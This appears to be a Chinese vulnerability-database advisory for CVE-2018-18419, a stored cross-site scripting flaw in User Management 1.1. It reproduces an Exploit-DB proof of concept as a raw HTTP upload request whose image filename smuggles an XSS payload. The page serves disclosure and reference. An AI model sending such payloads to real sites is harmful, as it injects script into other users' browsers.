User Management 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1358994 漏洞类型 跨站脚本
发布时间 2018-10-25 更新时间 2018-10-25
CVE编号 CVE-2018-18419 CNNVD-ID CNNVD-201810-1060
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/45686
https://cxsecurity.com/issue/WLB-2018100158
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1060
|漏洞详情
User Management是一款用户管理器。 User Management 1.1版本中的上传部分存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的Web脚本或HTML。
|漏洞EXP
# Exploit Title: User Management 1.1 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://ardawan.com/
# Software Link : http://um.ardawan.com
# Software : User Management
# Version : 1.1
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-18419

# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1,
#  as demonstrated by a .jpg filename to the /account URI.
 
# HTTP POST Request :

POST /Cpanel/account HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/Cpanel/account
Content-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504
Content-Length: 1574638
Cookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7088451293981732581393631504
Content-Disposition: form-data; name="fullName"

Admin
-----------------------------7088451293981732581393631504
Content-Disposition: form-data; name="profileImage"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/149850/User-Management-1.1-Cross-Site-Scripting.html